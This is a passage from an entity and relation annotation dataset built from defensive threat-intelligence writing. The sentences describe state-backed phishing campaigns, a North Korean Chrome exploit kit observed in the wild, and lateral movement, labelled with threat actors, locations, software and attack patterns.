Drive.","entities":[{"id":51096,"label":"SOFTWARE","start_offset":212,"end_offset":231},{"id":51095,"label":"SOFTWARE","start_offset":195,"end_offset":207}],"relations":[],"Comments":[]} {"id":5028,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[],"relations":[],"Comments":[]} {"id":5029,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":51097,"label":"SOFTWARE","start_offset":49,"end_offset":69}],"relations":[],"Comments":[]} {"id":5030,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.","entities":[{"id":51098,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":51100,"label":"location","start_offset":72,"end_offset":82},{"id":51101,"label":"SOFTWARE","start_offset":180,"end_offset":185},{"id":51102,"label":"attack-pattern","start_offset":199,"end_offset":218},{"id":51099,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1043,"from_id":51099,"to_id":51100,"type":"located-at"},{"id":1044,"from_id":51099,"to_id":51101,"type":"uses"},{"id":1045,"from_id":51099,"to_id":51102,"type":"uses"}],"Comments":[]} {"id":5031,"text":"This campaign, targeting high risk individuals in Ukraine, contained links leading to compromised websites where the first stage phishing page was hosted.","entities":[{"id":51103,"label":"location","start_offset":50,"end_offset":57}],"relations":[],"Comments":[]} {"id":5032,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} {"id":5033,"text":"There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.","entities":[{"id":51104,"label":"identity","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":5034,"text":"Both pages from this campaign are shown below.","entities":[],"relations":[],"Comments":[]} {"id":5035,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":51105,"label":"TIME","start_offset":3,"end_offset":12},{"id":51106,"label":"identity","start_offset":14,"end_offset":17},{"id":51107,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":51108,"label":"SOFTWARE","start_offset":80,"end_offset":88}],"relations":[],"Comments":[]} {"id":5036,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":51110,"label":"identity","start_offset":119,"end_offset":141},{"id":51109,"label":"location","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":5037,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":51116,"label":"location","start_offset":232,"end_offset":238},{"id":51117,"label":"location","start_offset":243,"end_offset":255},{"id":51113,"label":"identity","start_offset":93,"end_offset":96},{"id":51115,"label":"location","start_offset":223,"end_offset":230},{"id":51112,"label":"threat-actor","start_offset":70,"end_offset":83},{"id":51111,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51114,"label":"identity","start_offset":111,"end_offset":126}],"relations":[{"id":1046,"from_id":51112,"to_id":51114,"type":"attributed-to"},{"id":1047,"from_id":51112,"to_id":51115,"type":"targets"},{"id":1048,"from_id":51112,"to_id":51116,"type":"targets"},{"id":1049,"from_id":51112,"to_id":51117,"type":"targets"}],"Comments":[]} {"id":5038,"text":"In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs.","entities":[{"id":51119,"label":"identity","start_offset":106,"end_offset":133},{"id":51118,"label":"location","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} {"id":5039,"text":"Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.","entities":[{"id":51120,"label":"identity","start_offset":20,"end_offset":23},{"id":51122,"label":"identity","start_offset":129,"end_offset":154},{"id":51121,"label":"identity","start_offset":77,"end_offset":122}],"relations":[],"Comments":[]} {"id":5040,"text":" Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[{"id":51123,"label":"SOFTWARE","start_offset":67,"end_offset":80}],"relations":[],"Comments":[]} {"id":5041,"text":"We also send all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51125,"label":"SOFTWARE","start_offset":36,"end_offset":45},{"id":51124,"label":"SOFTWARE","start_offset":26,"end_offset":31}],"relations":[],"Comments":[]} {"id":5042,"text":"We encourage any potential targets to enable Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} {"id":5043,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} {"id":5044,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} {"id":5045,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region.","entities":[{"id":51126,"label":"location","start_offset":53,"end_offset":60},{"id":51127,"label":"location","start_offset":65,"end_offset":71}],"relations":[],"Comments":[]} {"id":5046,"text":"In early March, Google’s Threat Analysis Group (TAG) published an update on the cyber activity it was tracking with regard to the war in Ukraine.","entities":[{"id":51129,"label":"identity","start_offset":16,"end_offset":52},{"id":51130,"label":"location","start_offset":137,"end_offset":144},{"id":51128,"label":"TIME","start_offset":3,"end_offset":14}],"relations":[],"Comments":[]} {"id":5047,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51131,"label":"identity","start_offset":23,"end_offset":26},{"id":51132,"label":"attack-pattern","start_offset":106,"end_offset":134}],"relations":[],"Comments":[]} {"id":5048,"text":"Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links.","entities":[{"id":51136,"label":"location","start_offset":59,"end_offset":65},{"id":51137,"label":"location","start_offset":125,"end_offset":132},{"id":51133,"label":"location","start_offset":30,"end_offset":35},{"id":51134,"label":"location","start_offset":37,"end_offset":41},{"id":51135,"label":"location","start_offset":43,"end_offset":54}],"relations":[],"Comments":[]} {"id":5049,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} {"id":5050,"text":"For example, one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine.","entities":[{"id":51138,"label":"location","start_offset":101,"end_offset":108}],"relations":[],"Comments":[]} {"id":5051,"text":"TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.","entities":[{"id":51139,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5052,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51140,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} {"id":5053,"text":"We promptly identify and remove any such content, but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} {"id":5054,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.","entities":[{"id":51145,"label":"location","start_offset":220,"end_offset":227},{"id":51148,"label":"location","start_offset":253,"end_offset":261},{"id":51149,"label":"identity","start_offset":179,"end_offset":216},{"id":51141,"label":"identity","start_offset":47,"end_offset":50},{"id":51142,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":51143,"label":"identity","start_offset":112,"end_offset":115},{"id":51144,"label":"identity","start_offset":130,"end_offset":145},{"id":51146,"label":"location","start_offset":229,"end_offset":235},{"id":51147,"label":"location","start_offset":237,"end_offset":247}],"relations":[{"id":1050,"from_id":51142,"to_id":51144,"type":"attributed-to"},{"id":1051,"from_id":51142,"to_id":51149,"type":"targets"},{"id":1052,"from_id":51142,"to_id":51145,"type":"targets"},{"id":1053,"from_id":51142,"to_id":51146,"type":"targets"},{"id":1054,"from_id":51142,"to_id":51147,"type":"targets"},{"id":1055,"from_id":51142,"to_id":51148,"type":"targets"}],"Comments":[]} {"id":5055,"text":"While this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations.","entities":[{"id":51150,"label":"identity","start_offset":44,"end_offset":50}],"relations":[],"Comments":[]} {"id":5056,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":51151,"label":"threat-actor","start_offset":30,"end_offset":43},{"id":51152,"label":"threat-actor","start_offset":55,"end_offset":64},{"id":51153,"label":"location","start_offset":68,"end_offset":75},{"id":51154,"label":"threat-actor","start_offset":120,"end_offset":127},{"id":51155,"label":"attack-pattern","start_offset":142,"end_offset":171},{"id":51157,"label":"identity","start_offset":226,"end_offset":255},{"id":51158,"label":"identity","start_offset":263,"end_offset":295},{"id":51156,"label":"identity","start_offset":191,"end_offset":220}],"relations":[{"id":1056,"from_id":51152,"to_id":51153,"type":"located-at"},{"id":1057,"from_id":51154,"to_id":51152,"type":"duplicate-of"},{"id":1058,"from_id":51152,"to_id":51155,"type":"uses"},{"id":1059,"from_id":51152,"to_id":51156,"type":"targets"},{"id":1060,"from_id":51152,"to_id":51157,"type":"targets"},{"id":1061,"from_id":51152,"to_id":51158,"type":"targets"}],"Comments":[]} {"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} {"id":5058,"text":"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.","entities":[{"id":51163,"label":"SOFTWARE","start_offset":46,"end_offset":51}],"relations":[],"Comments":[]} {"id":5059,"text":"We have not observed any Gmail accounts successfully compromised during these campaigns.","entities":[{"id":51164,"label":"SOFTWARE","start_offset":25,"end_offset":30}],"relations":[],"Comments":[]} {"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} {"id":5061,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":51167,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":5062,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":51168,"label":"identity","start_offset":6,"end_offset":9}],"relations":[],"Comments":[]} {"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} {"id":5064,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":51171,"label":"DOMAIN","start_offset":81,"end_offset":94}],"relations":[],"Comments":[]} {"id":5065,"text":"Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.","entities":[],"relations":[],"Comments":[]} {"id":5066,"text":"Recently observed Ghostwriter credential phishing domains:","entities":[{"id":51172,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51173,"label":"attack-pattern","start_offset":30,"end_offset":49}],"relations":[{"id":1067,"from_id":51172,"to_id":51173,"type":"uses"}],"Comments":[]} {"id":5067,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} {"id":5068,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} {"id":5069,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region.","entities":[{"id":51174,"label":"location","start_offset":53,"end_offset":60},{"id":51175,"label":"location","start_offset":65,"end_offset":71}],"relations":[],"Comments":[]} {"id":5070,"text":"On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.","entities":[{"id":51176,"label":"TIME","start_offset":3,"end_offset":14},{"id":51177,"label":"identity","start_offset":16,"end_offset":37},{"id":51178,"label":"threat-actor","start_offset":62,"end_offset":108},{"id":51179,"label":"vulnerability","start_offset":122,"end_offset":157},{"id":51180,"label":"vulnerability","start_offset":169,"end_offset":182},{"id":51181,"label":"SOFTWARE","start_offset":161,"end_offset":167}],"relations":[{"id":1068,"from_id":51179,"to_id":51180,"type":"duplicate-of"},{"id":1069,"from_id":51181,"to_id":51180,"type":"has"},{"id":1070,"from_id":51178,"to_id":51180,"type":"exploits"}],"Comments":[]} {"id":5071,"text":"These groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus.","entities":[{"id":51183,"label":"campaign","start_offset":76,"end_offset":95},{"id":51182,"label":"campaign","start_offset":52,"end_offset":71}],"relations":[],"Comments":[]} {"id":5072,"text":"We observed the campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.","entities":[{"id":51184,"label":"location","start_offset":36,"end_offset":40}],"relations":[],"Comments":[]} {"id":5073,"text":"However, other organizations and countries may have been targeted.","entities":[],"relations":[],"Comments":[]} {"id":5074,"text":"One of the campaigns has direct infrastructure overlap with a campaign targeting security researchers which we reported on last year.","entities":[],"relations":[],"Comments":[]} {"id":5075,"text":"The exploit was patched on February 14, 2022.","entities":[{"id":51185,"label":"TIME","start_offset":27,"end_offset":44}],"relations":[],"Comments":[]} {"id":5076,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[{"id":51186,"label":"TIME","start_offset":77,"end_offset":92}],"relations":[],"Comments":[]} {"id":5077,"text":"We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques.","entities":[],"relations":[],"Comments":[]} {"id":5078,"text":"It is possible that other North Korean government-backed attackers have access to the same exploit kit.","entities":[{"id":51187,"label":"threat-actor","start_offset":26,"end_offset":66}],"relations":[],"Comments":[]} {"id":5079,"text":"In this blog, we will walk through the observed tactics, techniques and procedures, share relevant IOCs and analyze the exploit kit used by the attackers.","entities":[],"relations":[],"Comments":[]} {"id":5080,"text":"In line with our current disclosure policy, we are providing these details 30 days after the patch release.","entities":[],"relations":[],"Comments":[]} {"id":5081,"text":"The campaign, consistent with Operation Dream Job, targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors.","entities":[{"id":51188,"label":"campaign","start_offset":30,"end_offset":49}],"relations":[],"Comments":[]} {"id":5082,"text":"The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities.","entities":[{"id":51189,"label":"identity","start_offset":64,"end_offset":70},{"id":51191,"label":"identity","start_offset":83,"end_offset":89},{"id":51190,"label":"identity","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":5083,"text":"The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.","entities":[{"id":51193,"label":"identity","start_offset":84,"end_offset":96},{"id":51192,"label":"identity","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":5084,"text":"Victims who clicked on the links would be served a hidden iframe that would trigger the exploit kit.","entities":[],"relations":[],"Comments":[]} {"id":5085,"text":"Attacker-Owned Fake Job Domains: Exploitation URLs:","entities":[],"relations":[],"Comments":[]} {"id":5086,"text":"Another North Korean group, whose activity has been publicly tracked as Operation AppleJeus, targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit.","entities":[{"id":51194,"label":"location","start_offset":8,"end_offset":20},{"id":51195,"label":"campaign","start_offset":72,"end_offset":91}],"relations":[],"Comments":[]} {"id":5087,"text":"This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.","entities":[],"relations":[],"Comments":[]} {"id":5088,"text":"In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.","entities":[],"relations":[],"Comments":[]} {"id":5089,"text":"Attacker-Owned Websites: Compromised Websites (Feb 7 - Feb 9): Exploitation URLs:","entities":[],"relations":[],"Comments":[]} {"id":5090,"text":"The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users.","entities":[],"relations":[],"Comments":[]} {"id":5091,"text":"The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.","entities":[],"relations":[],"Comments":[]} {"id":5092,"text":"The kit initially serves some heavily obfuscated javascript used to fingerprint the target system.","entities":[],"relations":[],"Comments":[]} {"id":5093,"text":"This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server.","entities":[],"relations":[],"Comments":[]} {"id":5094,"text":"If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript.","entities":[{"id":51196,"label":"SOFTWARE","start_offset":72,"end_offset":78},{"id":51197,"label":"attack-pattern","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} {"id":5095,"text":"If the RCE was successful, the javascript would request the next stage referenced within the script as “SBX”, a common acronym for Sandbox Escape.","entities":[{"id":51198,"label":"attack-pattern","start_offset":7,"end_offset":10},{"id":51199,"label":"attack-pattern","start_offset":131,"end_offset":145}],"relations":[],"Comments":[]} {"id":5096,"text":"We unfortunately were unable to recover any of the stages that followed the initial RCE.","entities":[{"id":51200,"label":"attack-pattern","start_offset":84,"end_offset":87}],"relations":[],"Comments":[]} {"id":5097,"text":"Careful to protect their exploits, the attackers deployed multiple safeguards to make it difficult for security teams to recover any of the stages.","entities":[],"relations":[],"Comments":[]} {"id":5098,"text":"These safeguards included: Although we recovered a Chrome RCE, we also found evidence where the attackers specifically checked for visitors using Safari on MacOS or Firefox (on any OS), and directed them to specific links on known exploitation servers.","entities":[{"id":51202,"label":"attack-pattern","start_offset":58,"end_offset":61},{"id":51201,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":51203,"label":"SOFTWARE","start_offset":146,"end_offset":152},{"id":51204,"label":"SOFTWARE","start_offset":156,"end_offset":161},{"id":51205,"label":"SOFTWARE","start_offset":165,"end_offset":172}],"relations":[],"Comments":[]} {"id":5099,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} {"id":5100,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} {"id":5101,"text":"The attackers made multiple attempts to use the exploit days after the vulnerability was patched on February 14, which stresses the importance of applying security updates as they become available.","entities":[{"id":51206,"label":"TIME","start_offset":100,"end_offset":111}],"relations":[],"Comments":[]} {"id":5102,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} {"id":5103,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[],"relations":[],"Comments":[]} {"id":5104,"text":"We also sent all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51207,"label":"SOFTWARE","start_offset":26,"end_offset":45}],"relations":[],"Comments":[]} {"id":5105,"text":"We encourage any potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} {"id":5106,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from these activities.","entities":[{"id":51208,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5107,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.","entities":[],"relations":[],"Comments":[]} {"id":5108,"text":"&nbsp; [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.","entities":[{"id":51211,"label":"attack-pattern","start_offset":155,"end_offset":171},{"id":51209,"label":"identity","start_offset":68,"end_offset":84},{"id":51210,"label":"identity","start_offset":90,"end_offset":110}],"relations":[{"id":1071,"from_id":51209,"to_id":51210,"type":"related-to"}],"Comments":[]} {"id":5109,"text":"And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.","entities":[],"relations":[],"Comments":[]} {"id":5110,"text":"Specifically how they launch their attacks","entities":[],"relations":[],"Comments":[]} {"id":5111,"text":"Now don't get me wrong, this isn't to blame on defenders.","entities":[],"relations":[],"Comments":[]} {"id":5112,"text":"This isn't to blame of the general public.","entities":[],"relations":[],"Comments":[]} {"id":5113,"text":"I'm going to go with Hollywood's to blame a little bit here, because we're watching movies in Hollywood inevitably…you know the hackers in their dark hat and with no lighting, underground, Lord knows where they find these places to hack from and they are attacking directly through.","entities":[],"relations":[],"Comments":[]} {"id":5114,"text":"You see a bunch of text go across the screen and they penetrate through the first firewall, through the second firewall in into the data.","entities":[],"relations":[],"Comments":[]} {"id":5115,"text":"That's not how it works at all.","entities":[],"relations":[],"Comments":[]} {"id":5116,"text":"That's ridiculous.","entities":[],"relations":[],"Comments":[]} {"id":5117,"text":"It's absurd.","entities":[],"relations":[],"Comments":[]} {"id":5118,"text":"[00:59] It makes for interesting cinema, just like the red code\/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.","entities":[],"relations":[],"Comments":[]} {"id":5119,"text":"Because a lot of people don't have the experience of working with cybersecurity, working in cybersecurity, so their only perception is what they see either through media—you know TV, movies, books—or if they happen to run into somebody at in the industry.","entities":[],"relations":[],"Comments":[]} {"id":5120,"text":"So there is an overwhelming amount of sort of information or misinformation.","entities":[],"relations":[],"Comments":[]} {"id":5121,"text":"Not even misinformation, just storytelling that tries to make it far more dramatic than it is.","entities":[],"relations":[],"Comments":[]} {"id":5122,"text":"The reality is that cybercriminals are out for profit.","entities":[],"relations":[],"Comments":[]} {"id":5123,"text":"We know this time and time again—yes a bunch of nation-state stuff does happen but the vast majority of you are unaffected by it same with there's a massive amount of script-kiddie just sort of scanning random people with random tools that are just seeing what they can get away with that and if you have solid, automated defenses that doesn't really impact you.","entities":[],"relations":[],"Comments":[]} {"id":5124,"text":"What does impact you is the vast majority of organized cybercriminals who are out to make a profit.","entities":[],"relations":[],"Comments":[]} {"id":5125,"text":"Trend Micro had a great series and continues to have a great series on the Underground, the Digital Underground that shows just how deep these profit motivations go.","entities":[{"id":51212,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":5126,"text":"This is very much a dark industry.","entities":[],"relations":[],"Comments":[]} {"id":5127,"text":"And with that in mind we come back to the concept of lateral movement.","entities":[{"id":51213,"label":"attack-pattern","start_offset":53,"end_offset":69}],"relations":[],"Comments":[]} {"id":5128,"text":"[02:22] If an attacker breaches into your systems, whether they come in like a fourth of all attacks do via email whether they come in directly through a server compromise, which is about half of all breaches according to the Verizon data breach investigation report or one of the other methods that is commonly used…then they start to move around within your network.","entities":[],"relations":[],"Comments":[]} {"id":5129,"text":"That's lateral movement.","entities":[{"id":51214,"label":"attack-pattern","start_offset":7,"end_offset":23}],"relations":[],"Comments":[]} {"id":5130,"text":"We talk about north\/south traffic with the network, which is basically inside the network to outside of the network, so out to the the internet and back.","entities":[],"relations":[],"Comments":[]} {"id":5131,"text":"East\/west is within the network itself.","entities":[],"relations":[],"Comments":[]} {"id":5132,"text":"Most defenses, traditional defenses worry about that north\/south traffic.","entities":[],"relations":[],"Comments":[]} {"id":5133,"text":"Not enough worry about the east\/west and it's breaking down finally.","entities":[],"relations":[],"Comments":[]} {"id":5134,"text":"We are getting rid of this hard perimeter.","entities":[],"relations":[],"Comments":[]} {"id":5135,"text":"\"It's mine, I defend everything inside\" …and realizing that this is actually how cybercriminals work.","entities":[],"relations":[],"Comments":[]} {"id":5136,"text":"Once they're inside they move around.","entities":[],"relations":[],"Comments":[]} {"id":5137,"text":"So we need to defend in-depth and have really great monitoring and protection tools within our networks because of this challenge of lateral movement.","entities":[],"relations":[],"Comments":[]} {"id":5138,"text":"[03:23] Let me give you a little easier to digest analogy.","entities":[],"relations":[],"Comments":[]} {"id":5139,"text":"Most of us in a home have a grocery list and maybe once a week—maybe twice–we head to the grocery store and we try to get everything we want off the list and then we come back.","entities":[],"relations":[],"Comments":[]} {"id":5140,"text":"That just makes sense.","entities":[],"relations":[],"Comments":[]} {"id":5141,"text":"That's how we do it.","entities":[],"relations":[],"Comments":[]} {"id":5142,"text":"Right?","entities":[],"relations":[],"Comments":[]} {"id":5143,"text":"You would never think of going, \"Okay.","entities":[],"relations":[],"Comments":[]} {"id":5144,"text":"Number one of the list is ketchup.","entities":[],"relations":[],"Comments":[]} {"id":5145,"text":"I'm going to drive to the store to get ketchup.","entities":[],"relations":[],"Comments":[]} {"id":5146,"text":"I'm going to buy it and I'm going to come back home.","entities":[],"relations":[],"Comments":[]} {"id":5147,"text":"I'm going to look at item number two.","entities":[],"relations":[],"Comments":[]} {"id":5148,"text":"I need a loaf of bread.","entities":[],"relations":[],"Comments":[]} {"id":5149,"text":"I'm going to drive back to the store.","entities":[],"relations":[],"Comments":[]} {"id":5150,"text":"I'm going to buy a loaf of bread and I'm going to come back and we can go to item 3, and I'm going to go and I'm going to come back.","entities":[],"relations":[],"Comments":[]} {"id":5151,"text":"I'm going to...\"","entities":[],"relations":[],"Comments":[]} {"id":5152,"text":"That's just ridiculous, right?","entities":[],"relations":[],"Comments":[]} {"id":5153,"text":"That's absolutely absurd and cybercrimals agree.","entities":[],"relations":[],"Comments":[]} {"id":5154,"text":"Once they've driven to the store.","entities":[],"relations":[],"Comments":[]} {"id":5155,"text":"They're going to buy everything that they need and everything that they see as an opportunity, right?","entities":[],"relations":[],"Comments":[]} {"id":5156,"text":"They are really susceptible to those end caps and impulse buys... and then they're going to leave.","entities":[],"relations":[],"Comments":[]} {"id":5157,"text":"This is how they attack our organizations.","entities":[],"relations":[],"Comments":[]} {"id":5158,"text":"We know that, because of the average time to detect a breach is around 197 days right now and that stat has fluctuated maybe plus or minus 15 days for the last decade.","entities":[],"relations":[],"Comments":[]} {"id":5159,"text":"We also know that it takes almost three…it takes two and a half to three months actually contain a breach once you discover it and the reason for all of this is lateral movement.","entities":[],"relations":[],"Comments":[]} {"id":5160,"text":"Once you're in as a cybercriminal, once you've made headway, once you gained a beachhead or a foothold within that network you're going to do everything you can to expand it because it's going to make you the most amount of money.","entities":[],"relations":[],"Comments":[]} {"id":5161,"text":"[04:55] What do you think?","entities":[],"relations":[],"Comments":[]} {"id":5162,"text":"Let us know in the comments below, hit us up on social @TrendMicro or you can reach me directly @marknca.","entities":[{"id":51216,"label":"identity","start_offset":96,"end_offset":104},{"id":51215,"label":"identity","start_offset":55,"end_offset":66}],"relations":[],"Comments":[]} {"id":5163,"text":"How are you handling lateral movement?","entities":[{"id":51217,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":5164,"text":"How are you trying to reduce it?","entities":[],"relations":[],"Comments":[]} {"id":5165,"text":"How are you looking for visibility across all of your systems?","entities":[],"relations":[],"Comments":[]} {"id":5166,"text":"Let's continue this conversation because when we talk we all get better and more secure online.","entities":[],"relations":[],"Comments":[]} {"id":5167,"text":" Tags Cloud | APT & Targeted Attacks | Cyber Crime | Expert Perspective | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":5168,"text":"By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics)","entities":[{"id":51226,"label":"identity","start_offset":129,"end_offset":141},{"id":51222,"label":"identity","start_offset":71,"end_offset":82},{"id":51224,"label":"identity","start_offset":100,"end_offset":110},{"id":51218,"label":"identity","start_offset":3,"end_offset":17},{"id":51220,"label":"identity","start_offset":36,"end_offset":56},{"id":51221,"label":"identity","start_offset":59,"end_offset":69},{"id":51223,"label":"identity","start_offset":84,"end_offset":98},{"id":51225,"label":"identity","start_offset":112,"end_offset":126},{"id":51227,"label":"identity","start_offset":143,"end_offset":149},{"id":51219,"label":"identity","start_offset":19,"end_offset":34},{"id":51228,"label":"identity","start_offset":156,"end_offset":178},{"id":51229,"label":"identity","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":5169,"text":"Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.","entities":[],"relations":[],"Comments":[]} {"id":5170,"text":"This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.","entities":[],"relations":[],"Comments":[]} {"id":5171,"text":" DDS is integral in embedded systems that require real-time machine-to-machine communication, facilitating a reliable communication layer between sensors, controllers, and actuators.","entities":[],"relations":[],"Comments":[]} {"id":5172,"text":"This technology is situated at the beginning of 